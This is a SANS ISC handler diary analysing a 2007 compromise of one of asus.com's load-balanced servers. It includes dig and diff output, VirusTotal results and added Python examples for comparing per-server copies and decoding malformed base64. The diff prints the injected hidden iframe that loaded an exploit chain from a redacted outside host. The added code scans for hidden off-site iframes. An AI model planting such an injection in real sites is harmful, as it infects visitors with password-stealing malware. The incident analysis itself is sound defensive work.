SANS ISC: InfoSec Handlers Diary Blog
asus.com exploited

Published: 2007-04-06
Last Updated: 2007-04-07 17:48:47 UTC
by Swa Frantzen (Version: 2)

In the past days a handful of readers sent us notes that asus.com was compromised. Unfortunately we could not find anything wrong in the HTML at all.

Today the Kaspersky blog had an entry about an ANI exploit loaded via an iframe at asus.com.

So we fetched a new copy, and still there was nothing to be seen, until Johannes suggested asus.com might be load balanced. And yes indeed, it seems it is using DNS load balancing:

$ dig asus.com a

; <<>> DiG 9.2.3 <<>> asus.com a
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;asus.com. IN A

;; ANSWER SECTION:
asus.com. 14400 IN A 195.33.130.151
asus.com. 14400 IN A 205.158.107.130

;; AUTHORITY SECTION:
asus.com. 14400 IN NS dns3.asus.com.
asus.com. 14400 IN NS dns7.asus.com.

;; Query time: 18 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri Apr 6 23:33:01 2007
;; MSG SIZE rcvd: 96

Fetching a copy of the home page from both servers and comparing the resulting pages yields:

(line breaks added to make page easier to read)

$ diff index.html index.html.1 
55c55
<
</table>
---
>
</table><iframe src=http://[DELETED].com/app/helptop.do?id=ad003
width=100 height=0></iframe>

Just goes to show that a load balanced site is a pain to investigate if only some of the servers are affected.
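The check the handlers ended up doing by hand (resolve every A record, fetch the front page from each server separately, diff the copies and look for hidden off-site iframes) can be scripted. The following is an added example, not the ISC handlers' own tooling: it assumes each server answers plain HTTP on port 80 and that the Host header is what selects the virtual host; the two page copies and the injected tag are constructed samples patterned on the diff above, with redacted.example standing in for the redacted host, and the diary does not say which of the two real servers was the affected one.

```python
"""Check every server behind a DNS load-balanced site for injected content.

Added example, not the ISC handlers' own tooling. It assumes the site answers
plain HTTP on every A record and that sending the Host header makes each
server return the same virtual host (the diary does not say how the copies
were fetched; the page samples below are constructed).
"""
import difflib
import re
import socket
import urllib.parse
import urllib.request

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name=value pairs: double-quoted, single-quoted or bare (as in the diary's diff)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def resolve_all(hostname):
    """Every IPv4 address the name currently resolves to (round-robin DNS)."""
    infos = socket.getaddrinfo(hostname, 80, socket.AF_INET, socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def fetch_from_address(hostname, ip, timeout=10):
    """Fetch / from one specific server; the Host header selects the vhost."""
    req = urllib.request.Request(f"http://{ip}/", headers={"Host": hostname})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def iframe_attributes(html):
    """Yield a lower-cased attribute dict for every <iframe> tag in the page."""
    for match in IFRAME_RE.finditer(html):
        attrs = {}
        for name, dq, sq, bare in ATTR_RE.findall(match.group(1)):
            attrs[name.lower()] = dq or sq or bare
        yield attrs


def suspicious_iframes(html, site_host):
    """src of every iframe that is invisible (zero width/height) or points
    off-site; both are typical of an injected loader frame."""
    hits = []
    for attrs in iframe_attributes(html):
        src = attrs.get("src", "")
        host = urllib.parse.urlsplit(src).hostname or ""
        hidden = attrs.get("height") == "0" or attrs.get("width") == "0"
        foreign = bool(host) and host != site_host and not host.endswith("." + site_host)
        if hidden or foreign:
            hits.append(src)
    return hits


def compare_copies(pages):
    """pages maps server address -> html. Diff each copy against the first
    (sorted) one and return {address: [lines only that copy has]} for the
    copies that differ. The baseline may itself be the bad one, so run
    suspicious_iframes() on every copy as well."""
    addresses = sorted(pages)
    baseline = pages[addresses[0]].splitlines()
    differing = {}
    for addr in addresses[1:]:
        added = [
            line[1:]
            for line in difflib.unified_diff(baseline, pages[addr].splitlines(), lineterm="", n=0)
            if line.startswith("+") and not line.startswith("+++")
        ]
        if added:
            differing[addr] = added
    return differing


def check_site(hostname):
    """Live check: fetch / from every A record and report the odd ones out."""
    pages = {ip: fetch_from_address(hostname, ip) for ip in resolve_all(hostname)}
    return compare_copies(pages), {ip: suspicious_iframes(h, hostname) for ip, h in pages.items()}


# Constructed samples standing in for the two copies of the home page. The
# injected tag mirrors the diary's diff, with redacted.example in place of
# the redacted host; which of the two real servers was affected is not stated.
CLEAN_PAGE = "<html><body>\n<table><tr><td>ASUS</td></tr>\n</table>\n</body></html>\n"
INJECTED_TAG = "<iframe src=http://redacted.example/app/helptop.do?id=ad003 width=100 height=0></iframe>"
INJECTED_PAGE = CLEAN_PAGE.replace("</table>\n", "</table>" + INJECTED_TAG + "\n")
SAMPLE_COPIES = {"195.33.130.151": CLEAN_PAGE, "205.158.107.130": INJECTED_PAGE}

if __name__ == "__main__":
    for addr, lines in compare_copies(SAMPLE_COPIES).items():
        print(f"{addr} differs from the baseline:")
        for line in lines:
            print("   +", line)
    for addr, html in SAMPLE_COPIES.items():
        print(addr, "suspicious iframes:", suspicious_iframes(html, "asus.com"))
```

Running it on the constructed copies reports the second copy as differing by exactly the injected line, and flags the zero-height off-site iframe in that copy only. On a live site, check_site() does the same across all A records; since the baseline copy could itself be the infected one, the iframe scan is run on every copy rather than only on the ones that differ.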

The script, at the time we looked at it, was obfuscated and led to a VBScript that is up to no good, pointing to another obfuscated JavaScript and an executable cloaked as a jpg file.

That file gives the following results over at VirusTotal:

Antivirus Version Update Result
AhnLab-V3 2007.4.7.0 20070406 -
AntiVir 7.3.1.48 20070406 TR/Drop.Ag.344576.B
Authentium 4.93.8 20070406 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 20070406 Win32:Tibs-ADO
AVG 7.5.0.447 20070405 -
BitDefender 7.2 20070406 -
CAT-QuickHeal 9.00 20070406 (Suspicious) - DNAScan
ClamAV devel-20070312 20070406 -
DrWeb 4.33 20070406 -
eSafe 7.0.15.0 20070406 suspicious Trojan/Worm
eTrust-Vet 30.7.3546 20070406 Win32/NSAnti
Ewido 4.0 20070406 -
F-Prot 4.3.1.45 20070404 W32/PWStealer.gen1
F-Secure 6.70.13030.0 20070406 -
FileAdvisor 1 20070407 -
Fortinet 2.85.0.0 20070406 suspicious
Ikarus T3.1.1.3 20070406 MalwareScope.Worm.Viking.3
Kaspersky 4.0.2.24 20070406 Trojan-PSW.Win32.OnLineGames.kw
McAfee 5003 20070406 New Malware.bc
Microsoft 1.2405 20070406 -
NOD32v2 2171 20070406 -
Norman 5.80.02 20070405 -
Panda 9.0.0.4 20070406 Suspicious file
Prevx1 V2 20070407 -
Sophos 4.16.0 20070406 Mal/EncPk-F
Sunbelt 2.2.907.0 20070403 -
Symantec 10 20070406 -
TheHacker 6.1.6.085 20070404 -
VBA32 3.11.3 20070406 Trojan-PSW.Win32.Nilage.ara
VirusBuster 4.3.7:9 20070406 -
Webwasher-Gateway 6.0.1 20070406 Trojan.Drop.Ag.344576.B

File:
Name next3.png
Size 100539
md5 42a248b8634da52d6044f87db9a8d794
sha1 cf612836be3c763ab9dc2c9afc0ccc112f2c2a04
Date scanned 04/07/2007 00:09:16 (CET)

Password stealer it seems, same old goal.

I've not seen an ANI exploit in there right now, but we could easily be looking at something that is dynamic in some other way as well.

UPDATE #1:
It seems ASUS did take down the hacked server in the meantime.

UPDATE #2:
That second JavaScript referred to in the VBScript above didn't decode; it seems it's just not encoded right. But when decoding the string with a plain base64 routine, it does decode to something that leads to an ANI exploit. You never know what a buggy script and a buggy browser do together.
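The lesson of that update is that a blob which fails a strict decoder may still be accepted by a tolerant one, which is what the browser ends up running. The following is an added example, not from the diary: it contrasts a strict base64 decoder with a lenient one that discards stray characters and repairs padding, on a constructed malformed blob (a correct encoding of a harmless sample string with line breaks inserted, one stray character and the trailing padding dropped).

```python
"""Strict vs tolerant base64 decoding of a blob that "isn't encoded right".

Added example, not from the diary. The malformed blob is constructed: a
correct encoding of PAYLOAD with line breaks inserted, one stray character
and the trailing padding dropped.
"""
import base64
import binascii
import re

NOT_B64 = re.compile(rb"[^A-Za-z0-9+/]")


def strict_decode(blob):
    """Decode only if the blob is clean base64; None otherwise."""
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def lenient_decode(blob):
    """Throw away everything outside the alphabet, repair the padding and
    decode; None only if the remaining length cannot be base64 at all."""
    cleaned = NOT_B64.sub(b"", blob)
    if len(cleaned) % 4 == 1:
        return None
    cleaned += b"=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned)


PAYLOAD = b"second stage: fetch the next script"
_good = base64.b64encode(PAYLOAD)
# constructed damage: 16-char lines, a stray '.' after the 5th char, no '='
MALFORMED = b"\n".join(_good[i:i + 16] for i in range(0, len(_good), 16))
MALFORMED = (MALFORMED[:5] + b"." + MALFORMED[5:]).rstrip(b"=")

if __name__ == "__main__":
    print("strict :", strict_decode(MALFORMED))
    print("lenient:", lenient_decode(MALFORMED))
```

When a decoded stage comes out empty or garbage during analysis, trying the tolerant path before concluding the sample is broken avoids missing the next stage the way the handlers nearly did here.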

UPDATE #3:
Roger tested other language versions of the ASUS websites, and there are more references out there to the first JavaScript, loaded via an iframe.

Off to warn them once again...

--
Swa Frantzen -- NET2S
